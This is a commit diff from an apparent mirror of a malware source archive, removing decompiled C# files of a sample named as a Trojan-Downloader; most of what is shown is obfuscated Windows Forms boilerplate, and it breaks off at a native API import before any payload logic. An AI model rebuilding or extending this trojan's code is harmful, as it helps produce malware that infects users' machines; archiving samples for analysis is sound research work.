mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
mov + add
This commit is contained in:
parent
7290cd4cd5
commit
4121be2648
@ -1,13 +0,0 @@
|
|||||||
using System.Reflection;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
[assembly: AssemblyCopyright("343847384-343434243565-6453454545133332456")]
|
|
||||||
[assembly: AssemblyTrademark("343847384-343434243565-6453454545133332456")]
|
|
||||||
[assembly: ComVisible(false)]
|
|
||||||
[assembly: AssemblyTitle("343847384-343434243565-6453454545133332456")]
|
|
||||||
[assembly: AssemblyProduct("343847384-343434243565-6453454545133332456")]
|
|
||||||
[assembly: AssemblyCompany("343847384-343434243565-6453454545133332456")]
|
|
||||||
[assembly: AssemblyDescription("343847384-343434243565-6453454545133332456")]
|
|
||||||
[assembly: AssemblyFileVersion("2.5.4.1")]
|
|
||||||
[assembly: Guid("5398abea-1ee2-4122-88b8-0084c6dd086f")]
|
|
||||||
[assembly: AssemblyVersion("2.1.3.4")]
|
|
@ -1,86 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: adfND.My.MyApplication
|
|
||||||
// Assembly: adfND, Version=2.1.3.4, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: B39AC443-093C-4412-BE50-149A7E6ADFED
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.cd-b42cf5dc593d9380920439dace615ab045e5dfbae25773d3b63b45980d1d1942.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using System;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Windows.Forms;
|
|
||||||
|
|
||||||
namespace adfND.My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal class MyApplication : WindowsFormsApplicationBase
|
|
||||||
{
|
|
||||||
private static List<WeakReference> __ENCList = new List<WeakReference>();
|
|
||||||
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
static MyApplication()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
private static void __ENCAddToList(object value)
|
|
||||||
{
|
|
||||||
lock (MyApplication.__ENCList)
|
|
||||||
{
|
|
||||||
if (MyApplication.__ENCList.Count == MyApplication.__ENCList.Capacity)
|
|
||||||
{
|
|
||||||
int index1 = 0;
|
|
||||||
int num = checked (MyApplication.__ENCList.Count - 1);
|
|
||||||
int index2 = 0;
|
|
||||||
while (index2 <= num)
|
|
||||||
{
|
|
||||||
if (MyApplication.__ENCList[index2].IsAlive)
|
|
||||||
{
|
|
||||||
if (index2 != index1)
|
|
||||||
MyApplication.__ENCList[index1] = MyApplication.__ENCList[index2];
|
|
||||||
checked { ++index1; }
|
|
||||||
}
|
|
||||||
checked { ++index2; }
|
|
||||||
}
|
|
||||||
MyApplication.__ENCList.RemoveRange(index1, checked (MyApplication.__ENCList.Count - index1));
|
|
||||||
MyApplication.__ENCList.Capacity = MyApplication.__ENCList.Count;
|
|
||||||
}
|
|
||||||
MyApplication.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[STAThread]
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Advanced)]
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|
||||||
internal static void Main(string[] Args)
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
}
|
|
||||||
MyProject.Application.Run(Args);
|
|
||||||
}
|
|
||||||
|
|
||||||
[DebuggerStepThrough]
|
|
||||||
public MyApplication()
|
|
||||||
: base(AuthenticationMode.Windows)
|
|
||||||
{
|
|
||||||
MyApplication.__ENCAddToList((object) this);
|
|
||||||
this.IsSingleInstance = false;
|
|
||||||
this.EnableVisualStyles = true;
|
|
||||||
this.SaveMySettingsOnExit = true;
|
|
||||||
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
|
|
||||||
}
|
|
||||||
|
|
||||||
[DebuggerStepThrough]
|
|
||||||
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.UNNamOqklECJPYk;
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,24 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: adfND.My.MyComputer
|
|
||||||
// Assembly: adfND, Version=2.1.3.4, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: B39AC443-093C-4412-BE50-149A7E6ADFED
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.cd-b42cf5dc593d9380920439dace615ab045e5dfbae25773d3b63b45980d1d1942.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.Devices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
|
|
||||||
namespace adfND.My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal class MyComputer : Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyComputer()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,212 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: adfND.My.MyProject
|
|
||||||
// Assembly: adfND, Version=2.1.3.4, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: B39AC443-093C-4412-BE50-149A7E6ADFED
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.cd-b42cf5dc593d9380920439dace615ab045e5dfbae25773d3b63b45980d1d1942.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.Collections;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.ComponentModel.Design;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Reflection;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
using System.Windows.Forms;
|
|
||||||
|
|
||||||
namespace adfND.My
|
|
||||||
{
|
|
||||||
[HideModuleName]
|
|
||||||
[StandardModule]
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
internal sealed class MyProject
|
|
||||||
{
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
|
|
||||||
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
|
|
||||||
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
static MyProject()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.Computer")]
|
|
||||||
internal static MyComputer Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.Application")]
|
|
||||||
internal static MyApplication Application
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.User")]
|
|
||||||
internal static User User
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.Forms")]
|
|
||||||
internal static MyProject.MyForms Forms
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.WebServices")]
|
|
||||||
internal static MyProject.MyWebServices WebServices
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal sealed class MyForms
|
|
||||||
{
|
|
||||||
public UNNamOqklECJPYk m_UNNamOqklECJPYk;
|
|
||||||
[ThreadStatic]
|
|
||||||
private static Hashtable m_FormBeingCreated;
|
|
||||||
|
|
||||||
public UNNamOqklECJPYk UNNamOqklECJPYk
|
|
||||||
{
|
|
||||||
[DebuggerNonUserCode] get
|
|
||||||
{
|
|
||||||
this.m_UNNamOqklECJPYk = MyProject.MyForms.Create__Instance__<UNNamOqklECJPYk>(this.m_UNNamOqklECJPYk);
|
|
||||||
return this.m_UNNamOqklECJPYk;
|
|
||||||
}
|
|
||||||
[DebuggerNonUserCode] set
|
|
||||||
{
|
|
||||||
if (value == this.m_UNNamOqklECJPYk)
|
|
||||||
return;
|
|
||||||
if (value != null)
|
|
||||||
throw new ArgumentException("Property can only be set to Nothing");
|
|
||||||
this.Dispose__Instance__<UNNamOqklECJPYk>(ref this.m_UNNamOqklECJPYk);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private static T Create__Instance__<T>(T Instance) where T : Form, new()
|
|
||||||
{
|
|
||||||
if ((object) Instance != null && !Instance.IsDisposed)
|
|
||||||
return Instance;
|
|
||||||
if (MyProject.MyForms.m_FormBeingCreated != null)
|
|
||||||
{
|
|
||||||
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
|
|
||||||
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
|
|
||||||
}
|
|
||||||
else
|
|
||||||
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
|
|
||||||
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
|
|
||||||
try
|
|
||||||
{
|
|
||||||
return new T();
|
|
||||||
}
|
|
||||||
catch (TargetInvocationException ex) when (
|
|
||||||
{
|
|
||||||
// ISSUE: unable to correctly present filter
|
|
||||||
ProjectData.SetProjectError((Exception) ex);
|
|
||||||
if (ex.InnerException != null)
|
|
||||||
{
|
|
||||||
SuccessfulFiltering;
|
|
||||||
}
|
|
||||||
else
|
|
||||||
throw;
|
|
||||||
}
|
|
||||||
)
|
|
||||||
{
|
|
||||||
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private void Dispose__Instance__<T>(ref T instance) where T : Form
|
|
||||||
{
|
|
||||||
instance.Dispose();
|
|
||||||
instance = default (T);
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public MyForms()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public override int GetHashCode() => base.GetHashCode();
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal new System.Type GetType() => typeof (MyProject.MyForms);
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public override string ToString() => base.ToString();
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
|
|
||||||
internal sealed class MyWebServices
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override int GetHashCode() => base.GetHashCode();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public override string ToString() => base.ToString();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public MyWebServices()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[ComVisible(false)]
|
|
||||||
internal sealed class ThreadSafeObjectProvider<T> where T : new()
|
|
||||||
{
|
|
||||||
internal T GetInstance
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get
|
|
||||||
{
|
|
||||||
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
|
|
||||||
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
|
|
||||||
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public ThreadSafeObjectProvider()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,74 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: adfND.My.MySettings
|
|
||||||
// Assembly: adfND, Version=2.1.3.4, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: B39AC443-093C-4412-BE50-149A7E6ADFED
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.cd-b42cf5dc593d9380920439dace615ab045e5dfbae25773d3b63b45980d1d1942.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Configuration;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
namespace adfND.My
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Advanced)]
|
|
||||||
[CompilerGenerated]
|
|
||||||
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
|
|
||||||
internal sealed class MySettings : ApplicationSettingsBase
|
|
||||||
{
|
|
||||||
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
|
|
||||||
private static bool addedHandler;
|
|
||||||
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
|
|
||||||
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
public MySettings()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Advanced)]
|
|
||||||
private static void AutoSaveSettings(object sender, EventArgs e)
|
|
||||||
{
|
|
||||||
if (!MyProject.Application.SaveMySettingsOnExit)
|
|
||||||
return;
|
|
||||||
MySettingsProperty.Settings.Save();
|
|
||||||
}
|
|
||||||
|
|
||||||
public static MySettings Default
|
|
||||||
{
|
|
||||||
get
|
|
||||||
{
|
|
||||||
if (!MySettings.addedHandler)
|
|
||||||
{
|
|
||||||
object handlerLockObject = MySettings.addedHandlerLockObject;
|
|
||||||
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
|
|
||||||
Monitor.Enter(handlerLockObject);
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (!MySettings.addedHandler)
|
|
||||||
{
|
|
||||||
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
|
|
||||||
{
|
|
||||||
if (!MyProject.Application.SaveMySettingsOnExit)
|
|
||||||
return;
|
|
||||||
MySettingsProperty.Settings.Save();
|
|
||||||
});
|
|
||||||
MySettings.addedHandler = true;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
Monitor.Exit(handlerLockObject);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
MySettings defaultInstance = MySettings.defaultInstance;
|
|
||||||
return defaultInstance;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,31 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: adfND.My.MySettingsProperty
|
|
||||||
// Assembly: adfND, Version=2.1.3.4, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: B39AC443-093C-4412-BE50-149A7E6ADFED
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.cd-b42cf5dc593d9380920439dace615ab045e5dfbae25773d3b63b45980d1d1942.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System.ComponentModel.Design;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
|
|
||||||
namespace adfND.My
|
|
||||||
{
|
|
||||||
[CompilerGenerated]
|
|
||||||
[StandardModule]
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
[HideModuleName]
|
|
||||||
internal sealed class MySettingsProperty
|
|
||||||
{
|
|
||||||
[HelpKeyword("My.Settings")]
|
|
||||||
internal static MySettings Settings
|
|
||||||
{
|
|
||||||
get
|
|
||||||
{
|
|
||||||
MySettings settings = MySettings.Default;
|
|
||||||
return settings;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,46 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: adfND.My.Resources.Resources
|
|
||||||
// Assembly: adfND, Version=2.1.3.4, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: B39AC443-093C-4412-BE50-149A7E6ADFED
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.cd-b42cf5dc593d9380920439dace615ab045e5dfbae25773d3b63b45980d1d1942.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Globalization;
|
|
||||||
using System.Resources;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
|
|
||||||
namespace adfND.My.Resources
|
|
||||||
{
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
[CompilerGenerated]
|
|
||||||
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
|
|
||||||
[StandardModule]
|
|
||||||
[HideModuleName]
|
|
||||||
internal sealed class Resources
|
|
||||||
{
|
|
||||||
private static ResourceManager resourceMan;
|
|
||||||
private static CultureInfo resourceCulture;
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Advanced)]
|
|
||||||
internal static ResourceManager ResourceManager
|
|
||||||
{
|
|
||||||
get
|
|
||||||
{
|
|
||||||
if (object.ReferenceEquals((object) adfND.My.Resources.Resources.resourceMan, (object) null))
|
|
||||||
adfND.My.Resources.Resources.resourceMan = new ResourceManager("adfND.Resources", typeof (adfND.My.Resources.Resources).Assembly);
|
|
||||||
return adfND.My.Resources.Resources.resourceMan;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Advanced)]
|
|
||||||
internal static CultureInfo Culture
|
|
||||||
{
|
|
||||||
get => adfND.My.Resources.Resources.resourceCulture;
|
|
||||||
set => adfND.My.Resources.Resources.resourceCulture = value;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,120 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<root>
|
|
||||||
<!--
|
|
||||||
Microsoft ResX Schema
|
|
||||||
|
|
||||||
Version 2.0
|
|
||||||
|
|
||||||
The primary goals of this format is to allow a simple XML format
|
|
||||||
that is mostly human readable. The generation and parsing of the
|
|
||||||
various data types are done through the TypeConverter classes
|
|
||||||
associated with the data types.
|
|
||||||
|
|
||||||
Example:
|
|
||||||
|
|
||||||
... ado.net/XML headers & schema ...
|
|
||||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
|
||||||
<resheader name="version">2.0</resheader>
|
|
||||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
|
||||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
|
||||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
|
||||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
|
||||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
|
||||||
</data>
|
|
||||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
|
||||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
|
||||||
<comment>This is a comment</comment>
|
|
||||||
</data>
|
|
||||||
|
|
||||||
There are any number of "resheader" rows that contain simple
|
|
||||||
name/value pairs.
|
|
||||||
|
|
||||||
Each data row contains a name, and value. The row also contains a
|
|
||||||
type or mimetype. Type corresponds to a .NET class that support
|
|
||||||
text/value conversion through the TypeConverter architecture.
|
|
||||||
Classes that don't support this are serialized and stored with the
|
|
||||||
mimetype set.
|
|
||||||
|
|
||||||
The mimetype is used for serialized objects, and tells the
|
|
||||||
ResXResourceReader how to depersist the object. This is currently not
|
|
||||||
extensible. For a given mimetype the value must be set accordingly:
|
|
||||||
|
|
||||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
|
||||||
that the ResXResourceWriter will generate, however the reader can
|
|
||||||
read any of the formats listed below.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.binary.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.soap.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
|
||||||
value : The object must be serialized into a byte array
|
|
||||||
: using a System.ComponentModel.TypeConverter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
-->
|
|
||||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
|
||||||
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
|
||||||
<xsd:element name="root" msdata:IsDataSet="true">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:choice maxOccurs="unbounded">
|
|
||||||
<xsd:element name="metadata">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" use="required" type="xsd:string" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="assembly">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:attribute name="alias" type="xsd:string" />
|
|
||||||
<xsd:attribute name="name" type="xsd:string" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="data">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="resheader">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:choice>
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:schema>
|
|
||||||
<resheader name="resmimetype">
|
|
||||||
<value>text/microsoft-resx</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="version">
|
|
||||||
<value>2.0</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="reader">
|
|
||||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="writer">
|
|
||||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
</root>
|
|
@ -1,73 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: adfND.TfvLgUdBvZbIbhpeKTUSXuCJmzyPTVNmCteMOjMQeaJXvwXgsV
|
|
||||||
// Assembly: adfND, Version=2.1.3.4, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: B39AC443-093C-4412-BE50-149A7E6ADFED
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.cd-b42cf5dc593d9380920439dace615ab045e5dfbae25773d3b63b45980d1d1942.exe
|
|
||||||
|
|
||||||
using adfND.My;
|
|
||||||
using System;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
namespace adfND
|
|
||||||
{
|
|
||||||
public class TfvLgUdBvZbIbhpeKTUSXuCJmzyPTVNmCteMOjMQeaJXvwXgsV
|
|
||||||
{
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
public TfvLgUdBvZbIbhpeKTUSXuCJmzyPTVNmCteMOjMQeaJXvwXgsV()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
|
|
||||||
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
|
|
||||||
